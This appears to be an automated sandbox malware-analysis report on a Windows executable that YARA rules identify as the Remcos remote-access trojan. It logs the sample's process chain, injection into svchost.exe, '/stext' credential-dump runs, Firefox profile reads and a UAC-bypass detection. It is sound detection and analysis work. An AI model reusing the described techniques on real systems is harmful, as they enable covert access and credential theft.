Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00078B13	0_2_00078B13
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003CD61	0_2_0003CD61
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00047006	0_2_00047006
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0002710E	0_2_0002710E
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00023190	0_2_00023190
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00011287	0_2_00011287
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_000333C7	0_2_000333C7
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003F419	0_2_0003F419
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00025680	0_2_00025680
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_000316C4	0_2_000316C4
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_000258C0	0_2_000258C0
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_000378D3	0_2_000378D3
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00031BB8	0_2_00031BB8
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00049D05	0_2_00049D05
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0001FE40	0_2_0001FE40
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00031FD0	0_2_00031FD0
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003BFE6	0_2_0003BFE6
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_01E736B0	0_2_01E736B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000AE800	5_2_000AE800
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CDBB5	5_2_000CDBB5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000AFE40	5_2_000AFE40
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0012804A	5_2_0012804A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000AE060	5_2_000AE060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000B4140	5_2_000B4140
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000C2405	5_2_000C2405
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000D6522	5_2_000D6522
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000D267E	5_2_000D267E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00120665	5_2_00120665
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000C283A	5_2_000C283A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000B6843	5_2_000B6843
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000D89DF	5_2_000D89DF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000B8A0E	5_2_000B8A0E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000D6A94	5_2_000D6A94
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00120AE2	5_2_00120AE2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00108B13	5_2_00108B13
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000FEB07	5_2_000FEB07
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CCD61	5_2_000CCD61
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000D7006	5_2_000D7006
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000B710E	5_2_000B710E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000B3190	5_2_000B3190
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000A1287	5_2_000A1287
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000C33C7	5_2_000C33C7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CF419	5_2_000CF419
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000B5680	5_2_000B5680
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000C16C4	5_2_000C16C4
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000B58C0	5_2_000B58C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000C78D3	5_2_000C78D3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000C1BB8	5_2_000C1BB8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000D9D05	5_2_000D9D05
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000C1FD0	5_2_000C1FD0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CBFE6	5_2_000CBFE6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_03B936B0	5_2_03B936B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0043E0CC	6_2_0043E0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041F0FA	6_2_0041F0FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00454159	6_2_00454159
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00438168	6_2_00438168
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004461F0	6_2_004461F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0043E2FB	6_2_0043E2FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0045332B	6_2_0045332B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0042739D	6_2_0042739D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004374E6	6_2_004374E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0043E558	6_2_0043E558
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00438770	6_2_00438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004378FE	6_2_004378FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00433946	6_2_00433946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0044D9C9	6_2_0044D9C9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00427A46	6_2_00427A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041DB62	6_2_0041DB62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00427BAF	6_2_00427BAF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00437D33	6_2_00437D33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00435E5E	6_2_00435E5E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00426E0E	6_2_00426E0E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0043DE9D	6_2_0043DE9D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00413FCA	6_2_00413FCA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00436FEA	6_2_00436FEA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044B040	7_2_0044B040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043610D	7_2_0043610D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00447310	7_2_00447310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044A490	7_2_0044A490
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040755A	7_2_0040755A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043C560	7_2_0043C560
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044B610	7_2_0044B610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044D6C0	7_2_0044D6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004476F0	7_2_004476F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044B870	7_2_0044B870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044081D	7_2_0044081D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00414957	7_2_00414957
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004079EE	7_2_004079EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00407AEB	7_2_00407AEB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044AA80	7_2_0044AA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00412AA9	7_2_00412AA9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00404B74	7_2_00404B74
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00404B03	7_2_00404B03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044BBD8	7_2_0044BBD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00404BE5	7_2_00404BE5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00404C76	7_2_00404C76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00415CFE	7_2_00415CFE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00416D72	7_2_00416D72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00446D30	7_2_00446D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00446D8B	7_2_00446D8B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00406E8F	7_2_00406E8F

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00416760 appears 69 times
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: String function: 00017F41 appears 35 times
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: String function: 00038B40 appears 42 times
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: String function: 00030D27 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 000C8B40 appears 42 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 000A7F41 appears 35 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 000C0D27 appears 70 times

Source: C:\Windows\SysWOW64\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8084 -s 1288

Source: cnaniAxghZ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: name.exe PID: 8048, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 8084, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@12/14@1/2

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0007A2D5 GetLastError,FormatMessageW,

0_2_0007A2D5

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00068713 AdjustTokenPrivileges,CloseHandle,	0_2_00068713
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00068CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00068CC3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000F8713 AdjustTokenPrivileges,CloseHandle,	5_2_000F8713
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000F8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	5_2_000F8CC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	6_2_00417952

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0007B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0007B59E

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0008F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0008F121

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0007C602 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0007C602

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00014FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00014FE9

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

6_2_0041AA4A

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

File created: C:\Users\user\AppData\Local\directory

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8084
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TLPQMO

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

File created: C:\Users\user\AppData\Local\Temp\aut708F.tmp

Source: cnaniAxghZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\svchost.exe

System information queried: HandleInformation

Source: C:\Windows\SysWOW64\svchost.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: svchost.exe, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2852218695.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 00000006.00000002.2877948678.00000000050C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: svchost.exe, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000007.00000003.2868319315.000000000312E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2868382286.0000000003130000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: svchost.exe, svchost.exe, 00000007.00000002.2868513015.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: cnaniAxghZ.exe

ReversingLabs: Detection: 79%

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

File read: C:\Users\user\Desktop\cnaniAxghZ.exe

Source: unknown	Process created: C:\Users\user\Desktop\cnaniAxghZ.exe "C:\Users\user\Desktop\cnaniAxghZ.exe"
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\cnaniAxghZ.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cnaniAxghZ.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ncqkhweaghcgworcchyfyhlbjpqn"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qwvdipptuputyufolskgjmgkrwiwkdi"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\aybv"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8084 -s 1288
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\cnaniAxghZ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cnaniAxghZ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ncqkhweaghcgworcchyfyhlbjpqn"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qwvdipptuputyufolskgjmgkrwiwkdi"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\aybv"	Jump to behavior

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: windows.storage.dll	Jump to behavior
